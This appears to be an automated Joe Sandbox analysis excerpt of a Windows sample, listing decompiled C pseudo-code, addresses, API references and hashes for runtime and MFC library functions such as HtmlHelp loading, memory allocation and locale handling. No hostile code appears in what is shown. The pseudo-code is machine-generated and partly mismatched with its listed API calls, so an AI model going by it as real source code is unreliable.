                  0x00401f10
                  0x00401f19
                  0x00401f2d
                  0x00401f32
                  0x00401f34
                  0x00401f37
                  0x00000000
                  0x00401f39
                  0x00401f42
                  0x00401f4a
                  0x00401f54
                  0x00401f59
                  0x00401f61
                  0x00401f66
                  0x00401f67
                  0x00401f68
                  0x00401f69
                  0x00401f6a
                  0x00401f6b
                  0x00401f6c
                  0x00401f6d
                  0x00401f6e
                  0x00401f6f
                  0x00401f76
                  0x00401f78
                  0x00401f7d
                  0x00401f86
                  0x00401f86
                  0x00401f1b
                  0x00401f1b
                  0x00401f1d
                  0x00401f2c
                  0x00401f2c

                  APIs
                  • std::exception::exception.LIBCMT ref: 00401F4A
                  • __CxxThrowException@8.LIBCMT ref: 00401F61
                  • std::exception::exception.LIBCMT ref: 00401F78
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: std::exception::exception$Exception@8Throw_malloc
                  • String ID: ,D
                  • API String ID: 2388904642-2732034087
                  • Opcode ID: 5a91244dc61db6b4960001abf83dbf608f453c14659f9fc0871eea721b21abe4
                  • Instruction ID: 8673c816494186eb5e8cec3c219452ea3debbcaea0862e8feb1ac87be8cd02ed
                  • Opcode Fuzzy Hash: 5a91244dc61db6b4960001abf83dbf608f453c14659f9fc0871eea721b21abe4
                  • Instruction Fuzzy Hash: 33F024B55083006BC308EFA5D551A5FB7A0AFC4B14F108E2FF55982181EB78E918C75F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004103CD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E004103CD(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E00424385(0xc);
				_push(E0040F587);
				_t26 = E004205C8(__ebx, 0x4664a8, __edi, _t25, _t27);
				_t28 = _t26;
				if(_t26 == 0) {
					E00406436(__ebx, 0x4664a8, __edi, _t26, _t28);
				}
				_t29 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E004243F7(0xc);
					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
				} else {
					_push("hhctrl.ocx");
					_t16 = E0040D5D6(_t21, 0x4664a8, _t24, _t26, _t29);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						 *(_t26 + 8) = _t17;
						__eflags = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}










                  0x004103cd
                  0x004103cd
                  0x004103cd
                  0x004103d5
                  0x004103da
                  0x004103e9
                  0x004103eb
                  0x004103ed
                  0x004103ef
                  0x004103ef
                  0x004103f4
                  0x004103f8
                  0x00410432
                  0x00410434
                  0x00000000
                  0x004103fa
                  0x004103fa
                  0x004103ff
                  0x00410405
                  0x0041040a
                  0x00410416
                  0x0041041c
                  0x0041041f
                  0x00410421
                  0x00000000
                  0x00000000
                  0x00410426
                  0x0041042c
                  0x0041042c
                  0x00000000
                  0x0041040c

                  APIs
                    • Part of subcall function 00424385: EnterCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243BF
                    • Part of subcall function 00424385: InitializeCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243D1
                    • Part of subcall function 00424385: LeaveCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243DE
                    • Part of subcall function 00424385: EnterCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243EE
                    • Part of subcall function 004205C8: __EH_prolog3_catch.LIBCMT ref: 004205CF
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00410416
                  • FreeLibrary.KERNEL32(?), ref: 00410426
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                  • String ID: HtmlHelpA$hhctrl.ocx
                  • API String ID: 2853499158-63838506
                  • Opcode ID: a7c92174e9797cb4f2285bf7dc8b88012e369848523b048c23d7c60f8b65bce2
                  • Instruction ID: 2d4502df0f2be6acf12af82616466bd765ca29f1fd83309a5bbf0ced49f2de9c
                  • Opcode Fuzzy Hash: a7c92174e9797cb4f2285bf7dc8b88012e369848523b048c23d7c60f8b65bce2
                  • Instruction Fuzzy Hash: C101DF31240716BBDB216F62ED05B9B3A90EF00725F50C42BFD4AA6592DBB8D8D0C62D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00429E40, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00429E40(void** __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				void* _t8;
				signed int _t13;
				long _t20;
				void** _t24;

				_t7 = _a8;
				_t24 = __ecx;
				_t20 = _t7 + 0x40;
				 *((intOrPtr*)(__ecx + 4)) = _t7;
				if(_t20 >= _t7) {
					_t8 = GlobalAlloc(0x40, _t20);
					 *_t24 = _t8;
					if(_t8 == 0) {
						goto L1;
					}
					_t22 = GlobalLock(_t8);
					E004059F9(_t10, _t24, _t22, _t24[1], _a4, _t24[1]);
					_t13 = E00429CD6(_t22);
					asm("sbb eax, eax");
					_t24[2] =  ~_t13 + 1;
					GlobalUnlock( *_t24);
					return 1;
				}
				L1:
				return 0;
			}










                  0x00429e45
                  0x00429e49
                  0x00429e4b
                  0x00429e4e
                  0x00429e53
                  0x00429e5c
                  0x00429e62
                  0x00429e66
                  0x00000000
                  0x00000000
                  0x00429e70
                  0x00429e7b
                  0x00429e81
                  0x00429e8d
                  0x00429e90
                  0x00429e93
                  0x00000000
                  0x00429e9c
                  0x00429e55
                  0x00000000

                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?,?,({A,0042A0CC,?,00000000,?,?,00417B28,?), ref: 00429E5C
                  • GlobalLock.KERNEL32 ref: 00429E6A
                  • GlobalUnlock.KERNEL32(?,?,?,?,00417B28,?), ref: 00429E93
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$AllocLockUnlock
                  • String ID: ({A
                  • API String ID: 3972497268-68099953
                  • Opcode ID: 539910cec0df4dc273f827e80377cc537fb231eed1920f1a78aa9b5fc57b8a86
                  • Instruction ID: 78985dd97654aa714ada66d8568104a7166f6ead4f49b098867bc33a613e7971
                  • Opcode Fuzzy Hash: 539910cec0df4dc273f827e80377cc537fb231eed1920f1a78aa9b5fc57b8a86
                  • Instruction Fuzzy Hash: 66F0AF76610211AFD711AF76DC08D6B7BECEB59711701483AFA5AC3240EA34D8018B65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0043E7E7, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E0043E7E7() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x456108;
					_v28 =  *0x456100;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                  0x0043e7ec
                  0x0043e7f4
                  0x0043e80b
                  0x0043e7b7
                  0x0043e7c0
                  0x0043e7cc
                  0x0043e7cf
                  0x0043e7d2
                  0x0043e7d4
                  0x0043e7d7
                  0x0043e7dc
                  0x0043e7e6
                  0x0043e7de
                  0x0043e7e2
                  0x0043e7e2
                  0x0043e7f6
                  0x0043e7fc
                  0x0043e804
                  0x00000000
                  0x0043e806
                  0x0043e806
                  0x0043e80a
                  0x0043e80a
                  0x0043e804

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,00434742), ref: 0043E7EC
                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0043E7FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: IsProcessorFeaturePresent$KERNEL32
                  • API String ID: 1646373207-3105848591
                  • Opcode ID: 90fb7d41d80d8563707bc5f7171b751eef93604b39a71be3eca5469cfeb1f5ed
                  • Instruction ID: 47c6caf6fecddeb87b6d1ac5e622b5b37c24e015e1786739191dd9ee142ae4fe
                  • Opcode Fuzzy Hash: 90fb7d41d80d8563707bc5f7171b751eef93604b39a71be3eca5469cfeb1f5ed
                  • Instruction Fuzzy Hash: 5CF03030A00A09E2DF002BB6BC0E76F7A74BB84747FA204A1E591B11D6DF35C475D25A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004391D4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004391D4(intOrPtr* __eax, intOrPtr __edi) {
				intOrPtr _t10;
				intOrPtr* _t12;

				_t10 = __edi;
				if(__edi == 0 || __eax == 0) {
					return 0;
				} else {
					_t12 =  *__eax;
					if(_t12 != __edi) {
						 *__eax = __edi;
						E00439086(__edi);
						if(_t12 != 0) {
							E00439115(_t12);
							if( *_t12 == 0 && _t12 != 0x463b50) {
								E00438F3D(_t12);
							}
						}
					}
					return _t10;
				}
			}





                  0x004391d4
                  0x004391d6
                  0x00439211
                  0x004391dc
                  0x004391dd
                  0x004391e1
                  0x004391e4
                  0x004391e6
                  0x004391ee
                  0x004391f1
                  0x004391fa
                  0x00439205
                  0x0043920a
                  0x004391fa
                  0x004391ee
                  0x0043920e
                  0x0043920e

                  APIs
                  • ___addlocaleref.LIBCMT ref: 004391E6
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 00439098
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390A5
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390B2
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390BF
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390CC
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390E8
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(8BF4428D), ref: 004390F8
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 0043910E
                  • ___removelocaleref.LIBCMT ref: 004391F1
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043912F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043913C
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439149
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439156
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439163
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043917F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043918F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 004391A5
                  • ___freetlocinfo.LIBCMT ref: 00439205
                    • Part of subcall function 00438F3D: ___free_lconv_mon.LIBCMT ref: 00438F83
                    • Part of subcall function 00438F3D: ___free_lconv_num.LIBCMT ref: 00438FA4
                    • Part of subcall function 00438F3D: ___free_lc_time.LIBCMT ref: 00439029
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                  • String ID: P;F
                  • API String ID: 467427115-821099583
                  • Opcode ID: f0e6cb0af9fd6effd16fa1cead2d76f3cdf8573a14f94cabc2d81ef908cc436e
                  • Instruction ID: 61ced1987d1eff592f3a7abbb9b964a4908a5711a4a26ed9b6d79d1087f2f2aa
                  • Opcode Fuzzy Hash: f0e6cb0af9fd6effd16fa1cead2d76f3cdf8573a14f94cabc2d81ef908cc436e
                  • Instruction Fuzzy Hash: 05E04F32501D22358E3629196410AABB2942F8E719F1A299BF834A7359EBEC4C8080AD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424340, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00424340(void* __eax, void* __ebx, void* __edx, void* __edi) {
				void* _t5;

				_t5 = __eax;
				 *((intOrPtr*)(__ebx + __edi - 1)) =  *((intOrPtr*)(__ebx + __edi - 1)) + __edx;
			}




                  0x00424340
                  0x00424346

                  APIs
                  • DeleteCriticalSection.KERNEL32(00466878), ref: 0042435D
                  • DeleteCriticalSection.KERNEL32(004666E0), ref: 0042436F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalDeleteSection
                  • String ID: xhF$fF
                  • API String ID: 166494926-2610004491
                  • Opcode ID: 17e07cd01cf6e8a6c717a6b5203456bcd70ed8767fbb5cf33d83ccde3b0c3d01
                  • Instruction ID: 41b635fbd72690f6c41e90ba14f5db02281b1f503569879f63f8d22cb9e6b9e6
                  • Opcode Fuzzy Hash: 17e07cd01cf6e8a6c717a6b5203456bcd70ed8767fbb5cf33d83ccde3b0c3d01
                  • Instruction Fuzzy Hash: 75E086B27011245BC7206B6EFC8474AA26CEBC0361F57417BD94143261F3BD4840CEDE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424341, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00424341(void* __eax, void* __ebx, void* __edx, void* __edi) {
				void* _t5;

				_t5 = __eax;
				 *((intOrPtr*)(__ebx + __edi - 1)) =  *((intOrPtr*)(__ebx + __edi - 1)) + __edx;
			}




                  0x00424341
                  0x00424346

                  APIs
                  • DeleteCriticalSection.KERNEL32(00466878), ref: 0042435D
                  • DeleteCriticalSection.KERNEL32(004666E0), ref: 0042436F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalDeleteSection
                  • String ID: xhF$fF
                  • API String ID: 166494926-2610004491
                  • Opcode ID: a2c23b8625e8f413d0c71ed8152bdc380cf7b7c62905f3b5e4cc0b86a3a9fc4f
                  • Instruction ID: 362583a6ec685c06e829ffb7026d3f7272e8230db339484b57aec9b72c79060d
                  • Opcode Fuzzy Hash: a2c23b8625e8f413d0c71ed8152bdc380cf7b7c62905f3b5e4cc0b86a3a9fc4f
                  • Instruction Fuzzy Hash: 50E0CDE2B452251BC7206A6EFCC464E6A5CDFC036071745BBD881D3111F3AD9840C5DF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00447642, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E00447642(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t27;
				void* _t29;
				intOrPtr* _t34;
				void* _t35;

				_push(0x44);
				E00431A9B(E0044CAD4, __ebx, __edi, __esi);
				E00402CE0(_t35 - 0x28, "invalid string position");
				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
				_t27 = _t35 - 0x50;
				E004475BB(_t27, _t35 - 0x28);
				E00430CF4(_t35 - 0x50, 0x45e5f0);
				asm("int3");
				_push(4);
				E00431A9B(E0044CAF7, __ebx, __edi, __esi);
				_t34 = _t27;
				 *((intOrPtr*)(_t35 - 0x10)) = _t34;
				_t31 =  *((intOrPtr*)(_t35 + 8));
				E00430BE6(_t27, _t29,  *((intOrPtr*)(_t35 + 8)));
				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
				 *_t34 = 0x457ad0;
				E00402A50(_t34 + 0xc, _t31 + 0xc);
				return E00431B73(_t34);
			}







                  0x00447642
                  0x00447649
                  0x00447656
                  0x0044765b
                  0x00447663
                  0x00447666
                  0x00447674
                  0x00447679
                  0x0044767a
                  0x00447681
                  0x00447686
                  0x00447688
                  0x0044768b
                  0x0044768f
                  0x00447694
                  0x0044769f
                  0x004476a5
                  0x004476b1

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00447649
                  • std::bad_exception::bad_exception.LIBCMT ref: 00447666
                    • Part of subcall function 004475BB: std::runtime_error::runtime_error.LIBCPMT ref: 004475C6
                  • __CxxThrowException@8.LIBCMT ref: 00447674
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  Strings
                  • invalid string position, xrefs: 0044764E
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                  • String ID: invalid string position
                  • API String ID: 3299838469-1799206989
                  • Opcode ID: 1c56fdadc764f7005dc437fd44bc4dd561a6b57bd94f01df6c57617825768c93
                  • Instruction ID: 8efb31a1f4fd71fc9066c04bb15f7d7726a4351cfc37228a92b574e661cbd2dd
                  • Opcode Fuzzy Hash: 1c56fdadc764f7005dc437fd44bc4dd561a6b57bd94f01df6c57617825768c93
                  • Instruction Fuzzy Hash: 85D0127195520CAADB04E6D1CC66FDD7378AB04319F14142BB601B6482EBFC5608C768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041443A, Relevance: 6.2, APIs: 4, Instructions: 180COMMON
                  Download Yara Rule
                  C-Code - Quality: 40%
                  			E0041443A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, RECT* _a8) {
				signed int _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				RECT* _v292;
				struct tagRECT _v308;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				signed char _t65;
				signed int _t70;
				intOrPtr _t107;
				intOrPtr _t108;
				signed int _t113;
				signed int _t115;
				intOrPtr _t133;
				RECT* _t135;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr _t140;
				signed int _t145;
				void* _t146;

				_t133 = __edx;
				_t109 = __ecx;
				_t143 = _t145;
				_t146 = _t145 - 0x130;
				_t58 =  *0x463404; // 0x38a11573
				_v8 = _t58 ^ _t145;
				_t139 = _a4;
				_t135 = _a8;
				_t107 = __ecx;
				_v288 = _t139;
				_v292 = _t135;
				_t149 = __ecx;
				if(__ecx == 0) {
					L2:
					E00406436(_t107, _t109, _t135, _t139, _t149);
				}
				if(_t139 == 0) {
					goto L2;
				}
				_t62 = GetWindowRect( *(_t139 + 0x20),  &_v308);
				if( *((intOrPtr*)(_t139 + 0x90)) != _t107 || _t135 != 0 && EqualRect( &_v308, _t135) == 0) {
					if( *((intOrPtr*)(_t107 + 0x98)) != 0 && ( *(_t139 + 0x88) & 0x00000040) != 0) {
						 *(_t107 + 0x84) =  *(_t107 + 0x84) | 0x00000040;
					}
					 *(_t107 + 0x84) =  *(_t107 + 0x84) & 0xfffffff9;
					_t65 =  *(_t139 + 0x84) & 0x00000006 |  *(_t107 + 0x84);
					 *(_t107 + 0x84) = _t65;
					_t157 = _t65 & 0x00000040;
					if((_t65 & 0x00000040) == 0) {
						_push(0x104);
						_push( &_v268);
						E00412D87(_t107, _t139, _t133, _t135, _t139, _t157);
						E0041FC5A(_t139, _t133,  *((intOrPtr*)(_t107 + 0x20)),  &_v268);
					}
					_t70 = ( *(_t139 + 0x84) ^  *(_t107 + 0x84)) & 0x0000f000 ^  *(_t139 + 0x84) | 0x00000f00;
					if( *((intOrPtr*)(_t107 + 0x98)) == 0) {
						_t71 = _t70 & 0xfffffffe;
						__eflags = _t70 & 0xfffffffe;
					} else {
						_t71 = _t70 | 0x00000001;
					}
					E00420D66(_t139, _t71);
					_t136 = E004135F7(_t107, GetDlgCtrlID( *(_t139 + 0x20)), 0xffffffff);
					if(_t136 > 0) {
						 *((intOrPtr*)(E0040B917(_t107 + 0x9c, _t136))) = _t139;
					}
					if(_v292 == 0) {
						__eflags = _t136 - 1;
						if(_t136 < 1) {
							_t136 = _t107 + 0x9c;
							E004133A2(_t107 + 0x9c, _t139);
							E004133A2(_t107 + 0x9c, 0);
						}
						_t113 =  *0x466524; // 0x2
						_push(0x115);
						__eflags = 0;
						_push(0);
						_push(0);
						_push( ~_t113);
						_t115 =  *0x466520; // 0x2
						_push( ~_t115);
						_push(0);
					} else {
						E00413342( &_v284, _v292);
						E00422BFB(_t107,  &_v284);
						if(_t136 < 1) {
							asm("cdq");
							asm("cdq");
							_push((_v272 - _v280 - _t133 >> 1) + _v280);
							_push((_v276 - _v284 - _t133 >> 1) + _v284);
							_t136 = _t146 - 0x10;
							_push(_v288);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E0041365C(_t107);
							_t139 = _v288;
						}
						_push(0x114);
						_push(_v272 - _v280);
						_push(_v276 - _v284);
						_push(_v280);
						_push(_v284);
						_push(0);
					}
					E00412D05(_t139);
					if(E0040EE3C(_t107, _t139, GetParent( *(_t139 + 0x20))) != _t107) {
						E004133D6(_t139, _t107);
					}
					_t118 =  *((intOrPtr*)(_t139 + 0x90));
					if( *((intOrPtr*)(_t139 + 0x90)) != 0) {
						E00413A2C(_t118, _t136, _t139, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t139 + 0x90)) = _t107;
					 *(E00408487(_t107) + 0xe4) =  *(_t62 + 0xe4) | 0x0000000c;
				}
				_pop(_t137);
				_pop(_t140);
				_pop(_t108);
				return E00430650(_t62, _t108, _v8 ^ _t143, _t133, _t137, _t140);
			}






























                  0x0041443a
                  0x0041443a
                  0x0041443d
                  0x0041443f
                  0x00414445
                  0x0041444c
                  0x00414451
                  0x00414455
                  0x00414458
                  0x0041445a
                  0x00414460
                  0x00414466
                  0x00414468
                  0x0041446a
                  0x0041446a
                  0x0041446a
                  0x00414471
                  0x00000000
                  0x00000000
                  0x0041447d
                  0x00414489
                  0x004144b0
                  0x004144bb
                  0x004144bb
                  0x004144c2
                  0x004144d8
                  0x004144da
                  0x004144e0
                  0x004144e2
                  0x004144e4
                  0x004144ef
                  0x004144f2
                  0x00414501
                  0x00414501
                  0x0041451d
                  0x00414529
                  0x00414530
                  0x00414530
                  0x0041452b
                  0x0041452b
                  0x0041452b
                  0x00414536
                  0x0041454e
                  0x00414552
                  0x00414560
                  0x00414560
                  0x00414569
                  0x00414616
                  0x00414619
                  0x0041461b
                  0x00414624
                  0x0041462d
                  0x0041462d
                  0x00414632
                  0x00414638
                  0x0041463d
                  0x0041463f
                  0x00414640
                  0x00414643
                  0x00414644
                  0x0041464c
                  0x0041464d
                  0x0041456f
                  0x0041457b
                  0x00414589
                  0x00414591
                  0x004145a5
                  0x004145be
                  0x004145c9
                  0x004145ca
                  0x004145ce
                  0x004145d0
                  0x004145d6
                  0x004145d7
                  0x004145d8
                  0x004145db
                  0x004145dc
                  0x004145e1
                  0x004145e1
                  0x004145f3
                  0x004145f8
                  0x00414605
                  0x00414606
                  0x0041460c
                  0x00414612
                  0x00414612
                  0x00414650
                  0x00414666
                  0x0041466b
                  0x0041466b
                  0x00414670
                  0x00414678
                  0x0041467f
                  0x0041467f
                  0x00414686
                  0x00414691
                  0x00414691
                  0x0041469b
                  0x0041469c
                  0x0041469f
                  0x004146a6

                  APIs
                  • GetWindowRect.USER32 ref: 0041447D
                  • EqualRect.USER32 ref: 0041449B
                  • GetDlgCtrlID.USER32 ref: 00414540
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 00412D05: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,0040E9F3,?,?,0040E9F3,00000000,?,?,000000FF,000000FF,00000015), ref: 00412D2D
                  • GetParent.USER32(?), ref: 00414658
                    • Part of subcall function 004133D6: SetParent.USER32(?,?,?,004143C0,?,00000000), ref: 004133E9
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
